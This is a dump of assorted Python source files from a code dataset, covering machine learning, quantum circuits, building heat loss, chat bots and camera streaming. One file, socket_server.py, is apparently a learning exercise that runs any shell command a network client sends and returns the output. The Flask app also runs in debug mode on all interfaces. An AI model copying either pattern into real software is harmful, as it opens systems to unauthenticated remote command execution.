ProbabilityMaker(critic_prediction_data, critic_predictor, CriticVariable(Critic_result))\n # Audience\n Audience_result = str(FreshPredict(critic_prediction_data, audience_predictor))\n BreakevenAudienceVar = CriticVariable(Audience_result)\n Audience_percent = ProbabilityMaker(critic_prediction_data, audience_predictor, CriticVariable(Audience_result))\n # DataFrame to hold label codes matching user input and the predicted rating for 'fresh' or 'rotten'\n breakeven_prediction_data = pd.DataFrame({'dN' : [(\"%s\"%director[0])], 'aN' : [(\"%s\"%actor[0])], 'l1' : [(\"%s\"%country[0])], 'l2' : [(\"%s\"%state[0])],\n 'ge' : [(\"%s\"%genre[0])], 'f1' : [(\"%s\"%production[0])], 'runtime' : [int(runtime_input)], 'budget' : [int(budget_input)], 'C1' : [int(BreakevenCriticVar)], 'A1' : [int(BreakevenAudienceVar)]})\n ## Predictions for breakeven based on user input and predicted freshness\n Breakeven_result = str(BreakevenPredict(breakeven_prediction_data, breakeven_predictor))\n # Outputting predictions to results.html\n Breakeven_percent = ProbabilityMaker(breakeven_prediction_data, breakeven_predictor, BreakevenVariable(Breakeven_result))\n connector.close()\n return render_template(\"results.html\", Critic_result = Critic_result, Critic_percent = Critic_percent, Audience_result = Audience_result, Audience_percent = Audience_percent, Breakeven_result = Breakeven_result, Breakeven_percent = Breakeven_percent)\n except Exception as e:\n print(type(e))\n print(e)\n print(\"Unable to load the main web page.\")\n\nif __name__ == '__main__':\n# The arguments in this app.run() call permit you to make changes and reload the web page without restarting the server.\n #app.run (host = os.getenv('IP', '0.0.0.0'), port = int(os.getenv('PORT', 5000)), debug = True)\n app.debug = True\n app.run (host = '0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"592194402","text":"#encoding: utf8\n\nfrom common.utils.flask import register_api\nfrom . import controllers as ctrl, api\n\nurls = [\n (ctrl.LoginController, \"login\", \"/login/\"),\n (ctrl.NewsController, \"news\", \"/news/\"),\n (ctrl.NewsReportController, \"news.report\", \n \"/news//report/\", False),\n (ctrl.RegisterController, \"register\", \"/register/\"),\n\n]\n\nfor url in urls:\n register_api(api, *url)","sub_path":"api/v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319611862","text":"from django.urls import path\nfrom . 
import views\n\n\n\nurlpatterns = [\n    path('creat_an_account/' , views.register , name='register'),\n    path('login' , views.login , name='login'),\n    path('logout' , views.logoutView , name='logout'),\n    path('dashboard' , views.dashboard , name='dashboard'),\n] \n\n\n","sub_path":"web_project/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"426286463","text":"from __future__ import absolute_import \nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom my_model import MyModel, DataLoader\nimport time\nimport logging\nimport sys\nimport math\n\nimport tensorflow as tf \n\nlogging.basicConfig(format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n\t\t\t\t\tlevel = logging.DEBUG, \n\t\t\t\t\tstream = sys.stdout)\n\nMODEL_PATH = './model/model.ckpt'\nSUMMARY_PATH = './logs/'\n\nNUM_CLASSES = ord('z') - ord('a') + 1 + 1 + 1\nNUM_EPOCHS = 200\nNUM_FEATURES = 13  # input feature dimension; missing from the original, value assumed\nLST_NUM_HIDDEN = [100, 100, 200, 200]\nNUM_LAYERS = 4\nBATCH_SIZE = 4\nINITIAL_LEARNING_RATE = 1e-2\nMOMENTUM = 0.9\n\ndef main(argv):\n\tdata_loader = DataLoader('../data/only_folder', BATCH_SIZE)\n\n\twith tf.device('/cpu:0'):\n\t\tconfig = tf.ConfigProto()\n\t\tgraph = tf.Graph()\n\n\t\twith graph.as_default():\n\t\t\tlogging.debug('Starting new TensorFlow graph.')\n\t\t\t#======================TODO========================\n\t\t\tinputs = tf.placeholder(tf.int32, [None, None, NUM_FEATURES])\n\t\t\tlabels = tf.sparse_placeholder(tf.int32)\n\t\t\tseq_len = tf.placeholder(tf.int32, [None])\n\t\t\tphase_placeholder = tf.placeholder(tf.string)\n\t\t\t#==============================================\n\n\t\t\tmodel = MyModel(LST_NUM_HIDDEN, NUM_CLASSES, BATCH_SIZE)\n\n\t\t\tlogits = model.forward(inputs, phase_placeholder)\n\t\t\tcost = model.ctc_loss(labels, logits, seq_len)\n\n\t\t\toptim = tf.train.MomentumOptimizer(INITIAL_LEARNING_RATE, MOMENTUM).minimize(cost)\n\t\t\tdecoded, neg_sum_logits = tf.nn.ctc_greedy_decoder(logits, seq_len)\n\n\t\t\tlabel_error_rate = tf.reduce_mean(tf.edit_distance(tf.cast(decoded[0], tf.int32), labels))\n\n\t\twith tf.Session(config = config, graph = graph) as sess:\n\t\t\tlogging.debug('Starting TensorFlow session.')\n\n\t\t\tsaver = tf.train.Saver()\n\n\t\t\tmerged_summary = tf.summary.merge_all()\n\t\t\tsummary_writer = tf.summary.FileWriter(SUMMARY_PATH, tf.get_default_graph())\n\n\t\t\ttf.global_variables_initializer().run()\n\n\t\t\ttrain_num = data_loader.get_train_size()\n\t\t\tvalidation_num = data_loader.get_valid_size()\n\n\t\t\tif train_num <= 0:\n\t\t\t\tlogging.error('There are no training examples')\n\t\t\t\treturn\n\n\t\t\tnum_batches_per_epoch = math.ceil(train_num/BATCH_SIZE)\n\n\t\t\tfor phase in ['normal', 'sparse']:\n\t\t\t\tfor current_epoch in range(NUM_EPOCHS):\n\t\t\t\t\tstart_time = time.time()\n\n\t\t\t\t\ttrain_cost = 0\n\t\t\t\t\ttrain_label_error_rate = 0\n\n\t\t\t\t\tfor step in range(num_batches_per_epoch):\n\t\t\t\t\t\tbatch = data_loader.get_train_batch()\n\t\t\t\t\t\tfeed = {inputs : batch[0],\n\t\t\t\t\t\t\t\tlabels : batch[1],\n\t\t\t\t\t\t\t\tseq_len : batch[2],\n\t\t\t\t\t\t\t\tphase_placeholder : phase}\n\n\t\t\t\t\t\tbatch_cost, _, summary = sess.run([cost, optim, merged_summary], feed)\n\n\t\t\t\t\t\ttrain_cost += batch_cost * BATCH_SIZE\n\t\t\t\t\t\ttrain_label_error_rate += sess.run(label_error_rate, feed) * BATCH_SIZE\n\n\t\t\t\t\t\tsummary_writer.add_summary(summary, current_epoch * num_batches_per_epoch + step)\n\n\t\t\t\t\ttrain_cost /= train_num\n\t\t\t\t\ttrain_label_error_rate /= train_num\n\n\t\t\t\t\tvalid = data_loader.get_valid()\n\t\t\t\t\tvalid_feed = {inputs : valid[0],\n\t\t\t\t\t\t\t\t  labels : valid[1],\n\t\t\t\t\t\t\t\t  seq_len : valid[2],\n\t\t\t\t\t\t\t\t  phase_placeholder : phase}\n\n\t\t\t\t\tvalidation_cost, validation_label_error_rate = sess.run([cost, label_error_rate], valid_feed)\n\t\t\t\t\tvalidation_cost /= validation_num\n\t\t\t\t\tvalidation_label_error_rate /= validation_num\n\n\t\t\t\t\tlogging.info('Epoch %d/%d (time: %.3f s)', current_epoch + 1, NUM_EPOCHS, time.time() - start_time)\n\t\t\t\t\tlogging.info('Train cost: %.3f, train label error rate: %.3f', train_cost, train_label_error_rate)\n\t\t\t\t\tlogging.info('Validation cost: %.3f, validation label error rate: %.3f', validation_cost, validation_label_error_rate)\n\n\n\t\t# test_feed = {inputs : test_inputs,\n\t\t# \t\t\t seq_len : test_seq_len}\n\n\t\t# decoded_outputs = sess.run(decoded[0], test_feed)\n\t\t# dense_decoded = tf.sparse_tuples_from_sequences(decoded_outputs, default_value = -1).eval(session = sess)\n\t\t# test_num = test_texts.shape[0]\n\n\t\t# for i, sequence in enumerate(dense_decoded):\n\t\t# \tsequence = [s for s in sequence if s != -1]\n\t\t# \tdecoded_text = utils.sequence_decoder(sequence)\n\n\t\t# \tlogging.info('Sequence %d/%d', i + 1, test_num)\n\t\t# \tlogging.info('Original: \\n%s', test_texts[i])\n\t\t# \tlogging.info('Decoded: \\n %s', decoded_text)\n\n\t\t\tsave_path = saver.save(sess, MODEL_PATH)\n\t\t\tlogging.info('Model saved in file: %s', save_path)\n\nif __name__ == '__main__':\n\ttf.app.run()\n\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"35112216","text":"# Maximum subarray\n\ndef maxSubList(A):\n    best, curr = 0, 0\n    currIndx, strtIndx, bestIndx = 0, 0, 0\n\n    for i, j in enumerate(A):\n        if (curr + j > 0):\n            curr += j\n        else:\n            curr = 0\n            currIndx = i + 1\n        if curr > best:\n            strtIndx = currIndx\n            bestIndx = i + 1\n            best = curr\n    return strtIndx, bestIndx, best\n\nA = [-1,3,-5,4,6,-1,2,-7,13,-3]\n\nstart, end, total = maxSubList(A)\nprint('The max sublist (total: {}) \\\nstarts at {}, ends at {}'.format(total,start,end-1))","sub_path":"algorithms/maxSubList.py","file_name":"maxSubList.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"142398784","text":"size = []\n\nff = open('updatedSchema.txt', \"w+\")\nf = open('test.txt', \"r\")\nfor line in f:\n    l = line.split(\",\")\n    for newLine in open('schema.txt'):\n        if(newLine.startswith(l[0])):\n            size.append(newLine)\n    if((len(size))>1):\n        print(max(size))\n        ff.write(max(size))\n        ff.write('\\n')\n    else:\n        ff.write(str(size[0]))\n        ff.write('\\n')\n    print(len(size)) \n    print(size)\n    size = []\n\n\nwith open('updatedSchema.txt','w+') as file:\n    for line in file:\n        if not line.isspace():\n            file.write(line)\n\nff.truncate()\nf.close()\nff.close()\n \n \n","sub_path":"Progress review/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"307955316","text":"from thunder import ThunderContext\nfrom thunder import SourceExtraction\n\nfrom test_utils import PySparkTestCase\n\n\nclass TestBlockMethod(PySparkTestCase):\n\n    def test_nmf(self):\n        \"\"\"\n        (BlockMethod) nmf with defaults\n        \"\"\"\n        tsc = ThunderContext(self.sc)\n        data = 
tsc.makeExample('sources', dims=(60, 60), centers=[[20, 20], [40, 40]], noise=0.1, seed=42)\n\n model = SourceExtraction('nmf').fit(data, size=(30, 30))\n\n # order is irrelevant, but one of these must be true\n ep = 0.25\n cond1 = (model[0].distance([20, 20]) < ep) and (model[1].distance([40, 40]) < ep)\n cond2 = (model[0].distance([40, 40]) < ep) and (model[1].distance([20, 20]) < ep)\n assert(cond1 or cond2)\n","sub_path":"python/test/test_block_methods.py","file_name":"test_block_methods.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392568177","text":"# Copyright 2018 The Cirq Developers\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"A combination of several optimizations targeting XmonDevice.\"\"\"\nfrom functools import lru_cache\nfrom typing import Callable, cast, Optional, TYPE_CHECKING\n\nimport numpy as np\n\nimport cirq\nfrom cirq_google import ops as cg_ops\nfrom cirq_google.transformers.target_gatesets import sycamore_gateset\n\nif TYPE_CHECKING:\n import cirq_google\n\n\n_TARGET_GATESETS = {\n 'sqrt_iswap': lambda atol, _: cirq.SqrtIswapTargetGateset(atol=atol),\n 'sycamore': lambda atol, tabulation: sycamore_gateset.SycamoreTargetGateset(\n atol=atol, tabulation=tabulation\n ),\n 'xmon': lambda atol, _: cirq.CZTargetGateset(atol=atol),\n 'xmon_partial_cz': lambda atol, _: cirq.CZTargetGateset(atol=atol, allow_partial_czs=True),\n}\n\n\n@lru_cache()\ndef _gate_product_tabulation_cached(\n optimizer_type: str, tabulation_resolution: float\n) -> cirq.TwoQubitGateTabulation:\n random_state = np.random.RandomState(51)\n if optimizer_type == 'sycamore':\n return cirq.two_qubit_gate_product_tabulation(\n cirq.unitary(cg_ops.SYC), tabulation_resolution, random_state=random_state\n )\n else:\n raise NotImplementedError(f\"Two qubit gate tabulation not supported for {optimizer_type}\")\n\n\ndef optimized_for_sycamore(\n circuit: cirq.Circuit,\n *,\n qubit_map: Callable[[cirq.Qid], cirq.GridQubit] = lambda e: cast(cirq.GridQubit, e),\n optimizer_type: str = 'sqrt_iswap',\n tolerance: float = 1e-5,\n tabulation_resolution: Optional[float] = None,\n) -> cirq.Circuit:\n \"\"\"Optimizes a circuit for Google devices.\n\n Uses a set of optimizers that will compile to the proper gateset for the\n device (xmon, sqrt_iswap, or sycamore gates) and then use optimizers to\n compress the gate depth down as much as is easily algorithmically possible\n by merging rotations, ejecting Z gates, etc.\n\n Args:\n circuit: The circuit to optimize.\n qubit_map: Transforms the qubits (e.g. 
so that they are GridQubits).\n optimizer_type: A string defining the optimizations to apply.\n Possible values are 'xmon', 'xmon_partial_cz', 'sqrt_iswap',\n 'sycamore'\n tolerance: The tolerance passed to the various circuit optimization\n passes.\n tabulation_resolution: If provided, compute a gateset tabulation\n with the specified resolution and use it to approximately\n compile arbitrary two-qubit gates for which an analytic compilation\n is not known.\n Returns:\n The optimized circuit.\n\n Raises:\n ValueError: If the `optimizer_type` is not a supported type.\n \"\"\"\n copy = circuit.copy()\n if optimizer_type not in _TARGET_GATESETS:\n raise ValueError(\n f'{optimizer_type} is not an allowed type. Allowed '\n f'types are: {_TARGET_GATESETS.keys()}'\n )\n\n tabulation: Optional[cirq.TwoQubitGateTabulation] = None\n if tabulation_resolution is not None:\n tabulation = _gate_product_tabulation_cached(optimizer_type, tabulation_resolution)\n\n if optimizer_type in _TARGET_GATESETS:\n copy = cirq.optimize_for_target_gateset(\n circuit,\n gateset=_TARGET_GATESETS[optimizer_type](tolerance, tabulation),\n context=cirq.TransformerContext(deep=True),\n )\n copy = cirq.merge_single_qubit_gates_to_phxz(copy, atol=tolerance)\n copy = cirq.eject_phased_paulis(copy, atol=tolerance)\n copy = cirq.eject_z(copy, atol=tolerance)\n copy = cirq.drop_negligible_operations(copy, atol=tolerance)\n\n ret = cirq.Circuit(\n (op.transform_qubits(qubit_map) for op in copy.all_operations()),\n strategy=cirq.InsertStrategy.EARLIEST,\n )\n return ret\n","sub_path":"cirq-google/cirq_google/optimizers/optimize_for_sycamore.py","file_name":"optimize_for_sycamore.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"603349861","text":"import pandas as pd\nimport numpy as np\n\n\ndef calculate_fabric_heat_loss(\n roof_area,\n roof_uvalue,\n wall_area,\n wall_uvalue,\n floor_area,\n floor_uvalue,\n window_area,\n window_uvalue,\n door_area,\n door_uvalue,\n thermal_bridging_factor,\n):\n plane_elements_area = roof_area + floor_area + door_area + wall_area + window_area\n thermal_bridging = thermal_bridging_factor * plane_elements_area\n heat_loss_via_plane_elements = (\n wall_area * wall_uvalue\n + roof_area * roof_uvalue\n + floor_area * floor_uvalue\n + window_area * window_uvalue\n + door_area * door_uvalue\n )\n\n return thermal_bridging + heat_loss_via_plane_elements\n\n\ndef calculate_building_volume(\n ground_floor_area=None,\n ground_floor_height=None,\n first_floor_area=None,\n first_floor_height=None,\n second_floor_area=None,\n second_floor_height=None,\n third_floor_area=None,\n third_floor_height=None,\n no_of_storeys=None,\n floor_area=None,\n assumed_floor_height=None,\n):\n if ground_floor_area is not None:\n building_volume = (\n ground_floor_area * ground_floor_height\n + first_floor_area.fillna(0) * first_floor_height.fillna(0)\n + second_floor_area.fillna(0) * second_floor_height.fillna(0)\n + third_floor_area.fillna(0) * third_floor_height.fillna(0)\n )\n elif no_of_storeys is not None:\n building_volume = floor_area * no_of_storeys * assumed_floor_height\n else:\n raise ValueError(\n \"Must specify either 'no_of_storeys'\"\n \"or floor areas & heights to calculate building volume!\"\n )\n\n return building_volume\n\n\ndef calculate_ventilation_heat_loss(\n building_volume,\n effective_air_rate_change,\n):\n ventilation_heat_loss_constant = 0.33 # SEAI, DEAP 4.2.0\n return building_volume * 
ventilation_heat_loss_constant * effective_air_rate_change\n\n\ndef calculate_heat_loss_parameter(\n roof_area,\n roof_uvalue,\n wall_area,\n wall_uvalue,\n floor_area,\n floor_uvalue,\n window_area,\n window_uvalue,\n door_area,\n door_uvalue,\n total_floor_area,\n thermal_bridging_factor,\n effective_air_rate_change,\n ground_floor_area=None,\n ground_floor_height=None,\n first_floor_area=None,\n first_floor_height=None,\n second_floor_area=None,\n second_floor_height=None,\n third_floor_area=None,\n third_floor_height=None,\n no_of_storeys=None,\n assumed_floor_height=2.5,\n) -> pd.DataFrame:\n fabric_heat_loss = calculate_fabric_heat_loss(\n roof_area=roof_area,\n roof_uvalue=roof_uvalue,\n wall_area=wall_area,\n wall_uvalue=wall_uvalue,\n floor_area=floor_area,\n floor_uvalue=floor_uvalue,\n window_area=window_area,\n window_uvalue=window_uvalue,\n door_area=door_area,\n door_uvalue=door_uvalue,\n thermal_bridging_factor=thermal_bridging_factor,\n )\n building_volume = calculate_building_volume(\n ground_floor_area=ground_floor_area,\n ground_floor_height=ground_floor_height,\n first_floor_area=first_floor_area,\n first_floor_height=first_floor_height,\n second_floor_area=second_floor_area,\n second_floor_height=second_floor_height,\n third_floor_area=third_floor_area,\n third_floor_height=third_floor_height,\n no_of_storeys=no_of_storeys,\n floor_area=floor_area,\n assumed_floor_height=assumed_floor_height,\n )\n ventilation_heat_loss = calculate_ventilation_heat_loss(\n building_volume=building_volume,\n effective_air_rate_change=effective_air_rate_change,\n )\n heat_loss_coefficient = fabric_heat_loss + ventilation_heat_loss\n return heat_loss_coefficient / total_floor_area\n","sub_path":"dublin_building_stock/deap.py","file_name":"deap.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"569253782","text":"import requests\n\ndef lookup(word, api_key):\n payload = {'api_key': api_key, 'limit': 1}\n try:\n response = requests.get(\"http://api.wordnik.com:80/v4/word.json/%s/definitions\" % word.lower(), params=payload).json()\n return response[0]['text']\n except:\n return None\n\ndef define(phenny, input):\n word = input.group(2)\n if not word:\n phenny.say(\"-- .define \")\n else:\n definition = lookup(word, phenny.config.wordnik_api_key)\n if definition is None:\n phenny.say(\"Word not found!\")\n else:\n phenny.say(\"%s: %s\" % (word, definition))\ndefine.commands = ['define']\n\n\ndef wotd(phenny, input):\n payload = {'api_key': phenny.config.wordnik_api_key}\n response = requests.get(\"http://api.wordnik.com:80/v4/words.json/wordOfTheDay\", params=payload).json()\n definition = lookup(response['word'], phenny.config.wordnik_api_key)\n phenny.say(\"Word of the day: %s - %s\" % (response['word'], definition))\n\n \nwotd.commands = ['wotd']\n\ndef rword(phenny, input):\n payload = {'api_key': phenny.config.wordnik_api_key,\n 'hasDictionaryDef': 'true' }\n response = requests.get(\"http://api.wordnik.com:80/v4/words.json/randomWord\", params=payload).json()\n definition = lookup(response['word'], phenny.config.wordnik_api_key)\n phenny.say(\"Random word: %s - %s\" % (response['word'], definition))\nrword.commands = ['rword']\n","sub_path":"modules/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"31830128","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# 
Author:Liang Lian\n\nimport json\nimport socket\nimport subprocess\n\nip_port = ('127.0.0.1', 8000)\n# Create the socket object\ns = socket.socket()\n# Bind the IP and port to listen on\ns.bind(ip_port)\n# Set the maximum client backlog: at most five pending connections, any beyond that get an error\ns.listen(5)\nwhile True:  # main loop\n\n    # Only accept & recv block; accept blocks here until a client connects\n    # accept() takes the incoming client request: connection is the client object, address is the client's IP\n    connection, address = s.accept()\n\n    while True:\n        try:\n            # recv() receives the client's message\n            recv_data = connection.recv(1024)\n\n            # If it is empty, break out of this inner loop without doing anything\n            if not recv_data:\n                break\n\n            # Execute the command received from the client\n            p = subprocess.Popen(str(recv_data, encoding='utf-8'), shell=True, stdout=subprocess.PIPE)\n            # Get the command output\n            res = p.stdout.read()\n            if res:\n                send_data = str(res, encoding='utf-8')\n            else:\n                send_data = 'cmd error'\n\n            # Convert str to bytes\n            send_data = bytes(send_data, encoding='utf-8')\n\n            # Send a ready signal and the length of the upcoming payload, to prevent sticky packets (content beyond one receive showing up at the start of the next one)\n            '''\n            Sticky packets: if the command result string is 2018 characters long and the client only receives 1024 at a time, where does the leftover content go?\n            It shows up at the front of the next response - that is a sticky packet (chunked transfer where the receiver mixes up message boundaries)\n            '''\n            # Send the payload metadata to the client as JSON so it can prepare to receive\n            ready_dict = {'status': 'Ready',\n                          'msg_size': len(send_data),}\n            ready_tag = json.dumps(ready_dict)\n            connection.send(bytes(ready_tag, encoding='utf-8'))\n\n            # Wait for the client's 'Start' signal before sending\n            feedback = connection.recv(1024)  # Start\n            feedback = str(feedback, encoding='utf-8')\n            if feedback == 'Start':\n                # Send the command result\n                connection.send(send_data)\n\n        except Exception:\n            break\n\n    # Close the connection to the client\n    connection.close()\n\n\n","sub_path":"day9/远程执行命令/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"390400717","text":"#!/usr/bin/python\n\nimport sys\nimport socket\nimport logging\n\nfrom twisted.internet.task import LoopingCall\nfrom twisted.internet import reactor\n\nfrom instrumentation import sensorsDiscover\nfrom client import CarbonReporter\n\n\nclass Application(object):\n    def __init__(self):\n        self.__log = logging.getLogger(\"carbid\")\n        #\n        self.__prefix = \"carbid\"\n        self.cr = CarbonReporter(\"172.16.49.42\", 2003)\n        self.record_task = LoopingCall(self.recordMetrics)\n        self.sensors = []\n        self.sensors = sensorsDiscover()\n        #\n        self.HOSTNAME = socket.gethostname().replace('.','_')\n\n    def dispose(self):\n        self.record_task.stop()\n\n    def run(self):\n        self.record_task.start(15, False)\n        reactor.run()\n\n    def record(self, metric, value):\n        #\n        path = []\n        path.append(self.__prefix)\n        path.append(self.HOSTNAME)\n        path.append(metric)\n        #\n        fullMetric = \".\".join(path)\n        #\n        self.__log.debug(\"Report {name} => {value}\".format(name=fullMetric, value=value))\n        #\n        self.cr.sendDatapoint(fullMetric, value)\n\n    def recordMetrics(self):\n        for sensor in self.sensors:\n            sensor_name = sensor.name\n            sensor_value = sensor.sense()\n            #\n            self.record(sensor_name, sensor_value)\n\n\nif __name__ == \"__main__\":\n    logging.basicConfig(stream=sys.stderr, level=logging.INFO)\n    app = Application()\n    try:\n        app.run()\n    except Exception as err:\n        app.dispose()\n    ","sub_path":"lib/carbid/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"465492194","text":"#!/usr/bin/python3\n\n# -----------------------------------------------------------------------------\n# Libraries\n# -----------------------------------------------------------------------------\nimport socket\nimport time\nimport picamera\nimport sys\n\n# 
-----------------------------------------------------------------------------\n# Global definitions\n# -----------------------------------------------------------------------------\nDEBUG = False\nVIDEO_RESOLUTION = (640,480)\nVIDEO_FRAMERATE = 24\nVIDEO_FORMAT = 'h264'\nVIDEO_LENGTH = -1\nSERVER_IP = '0.0.0.0'\nSERVER_PORT = 10004\n\n# -----------------------------------------------------------------------------\n# Functions\n# -----------------------------------------------------------------------------\ndef start_video_server():\n if DEBUG: print(\"[MSG]> start video server\")\n \n # Open listening TCP socket\n with socket.socket() as server_socket:\n server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)\n server_socket.bind((SERVER_IP, SERVER_PORT))\n server_socket.listen(0)\n if DEBUG: print(\"[MSG]> listening on %s:%d\" % (SERVER_IP, SERVER_PORT))\n\n # Client is connected\n (client_socket, client_address) = server_socket.accept()\n if DEBUG: print(\"[MSG]> connection from %s:%d\" % (client_address))\n connection = client_socket.makefile('wb')\n\n # Open camera device\n with picamera.PiCamera() as camera:\n # Set camera configuration\n camera.resolution = VIDEO_RESOLUTION\n camera.framerate = VIDEO_FRAMERATE\n #camera.hflip = True\n #camera.vflip = True\n #camera.rotation = 90\n \n # Start camera streaming\n try:\n if DEBUG: print(\"[MSG]> start video capture\")\n camera.start_preview()\n time.sleep(1)\n camera.start_recording(connection, format=VIDEO_FORMAT)\n while True:\n camera.wait_recording(VIDEO_LENGTH)\n finally:\n camera.stop_recording()\n\n# -----------------------------------------------------------------------------\n# Main\n# -----------------------------------------------------------------------------\nif __name__ == \"__main__\":\n while 1:\n try:\n start_video_server()\n except KeyboardInterrupt:\n print(\"\\r\\n[MSG]> CTRL-C - keyboard interupt\")\n sys.exit(0)\n except BaseException as e:\n if DEBUG: print(\"[MSG]> error: exception %s\" % e)\n time.sleep(1)\n \n","sub_path":"rover_video_module_TCP.py","file_name":"rover_video_module_TCP.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"65705453","text":"import json\nimport threading\nimport unittest\n# based on scaling_multiplier: 0.60\nfrom typing import Any\n\nfrom ev3dev2simulator.config.config import get_config\nfrom ev3dev2simulator.connection.ClientSocketHandler import ClientSocketHandler\nfrom ev3dev2simulator.state.RobotState import RobotState\n\n\nclass ServerSocketTest(unittest.TestCase):\n\n def test_process_drive_command_degrees(self):\n d = {\n 'type': 'RotateCommand',\n 'address': 'ev3-ports:outA',\n 'speed': 10,\n 'distance': 100,\n 'stop_action': 'hold'\n }\n\n robot_state = RobotState()\n server = ClientSocketHandler(robot_state, None, 'left_brick')\n\n data = server._process_drive_command(d)\n val = self._deserialize(data)\n\n self.assertEqual(10, val)\n\n\n def test_process_drive_command_pixels(self):\n d = {\n 'type': 'RotateCommand',\n 'address': 'ev3-ports:outB',\n 'speed': 10,\n 'distance': 100,\n 'stop_action': 'hold'\n }\n\n robot_state = RobotState()\n server = ClientSocketHandler(robot_state, None, 'left_brick')\n\n data = server._process_drive_command(d)\n val = self._deserialize(data)\n\n self.assertEqual(10, val)\n\n\n def test_process_stop_command(self):\n d = {\n 'type': 'StopCommand',\n 'address': 'ev3-ports:outD',\n 'speed': 100,\n 'stop_action': 'coast'\n }\n\n 
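# note: the connection argument is None here; these tests exercise command processing only, without a live socket\n        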
robot_state = RobotState()\n server = ClientSocketHandler(robot_state, None, 'left_brick')\n\n data = server._process_stop_command(d)\n val = self._deserialize(data)\n\n self.assertAlmostEqual(0.0667, val, 3)\n\n\n def test_process_sound_command(self):\n d = {\n 'type': 'SoundCommand',\n 'message': 'A test is running at the moment!',\n }\n\n frames_per_second = get_config().get_data()['exec_settings']['frames_per_second']\n frames = int(round((32 / 2.5) * frames_per_second))\n robot_state = RobotState()\n\n server = ClientSocketHandler(robot_state, None, 'left_brick')\n server._process_sound_command(d)\n\n for i in range(frames):\n self.assertIsNotNone(robot_state.next_sound_job())\n\n self.assertIsNone(robot_state.next_sound_job())\n\n\n def test_process_data_request(self):\n d = {\n 'type': 'DataRequest',\n 'address': 'ev3-ports:in4',\n }\n\n robot_state = RobotState()\n robot_state.values['left_brick:ev3-ports:in4'] = 10\n robot_state.locks['left_brick:ev3-ports:in4'] = threading.Lock()\n\n server = ClientSocketHandler(robot_state, None, 'left_brick')\n data = server._process_data_request(d)\n val = self._deserialize(data)\n\n self.assertEqual(val, 10)\n\n\n def _deserialize(self, data: bytes) -> Any:\n \"\"\"\n Deserialize the given data.\n :param data: to be deserialized.\n :return: any type representing value inside the data.\n \"\"\"\n\n val = data.decode()\n obj_dict = json.loads(val)\n\n return obj_dict['value']\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/ev3dev2/simulator/connection/ServerSocketTest.py","file_name":"ServerSocketTest.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"139141839","text":"# import cv2\r\n# import numpy as np\r\n# # img = cv2.imread(\"lena.jpg\")\r\n# # blank = np.zeros((512,512,3), np.uint8)\r\n# # cv2.imshow(\"blank\",blank)\r\n# # cv2.waitKey(0)\r\n#\r\n# events = [i for i in dir(cv2) if 'EVENT' in i]\r\n# print(events)\r\n# drawing = False\r\n# mode =True\r\n# ix , iy = 1,1\r\n#\r\n# # mouse callback function\r\n# def draw_circle(event,x,y,flags,param):\r\n# global ix , iy , mode, drawing\r\n#\r\n# if event == cv2.EVENT_LBUTTONDOWN:\r\n# drawing = True\r\n# ix,iy = x,y\r\n# elif event == cv2.EVENT_MOUSEMOVE:\r\n# if drawing == True:\r\n# if mode == True:\r\n# cv2.rectangle(img,(ix,iy),(x,y),(0.255,0),-1)\r\n# else:\r\n# cv2.circle(img,(x,y),5,(0,255,0),-1)\r\n# elif event == cv2.EVENT_LBUTTONUP:\r\n# drawing = False\r\n# if mode == True:\r\n# cv2.rectangle(img, (ix, iy), (x, y), (0, 255, 0), -1)\r\n# else:\r\n# cv2.circle(img, (x, y), 5, (0, 0, 255), -1)\r\n#\r\n#\r\n# # Create a black image, a window and bind the function to window\r\n# img = np.zeros((512,512,3), np.uint8)\r\n# cv2.namedWindow('image')\r\n# 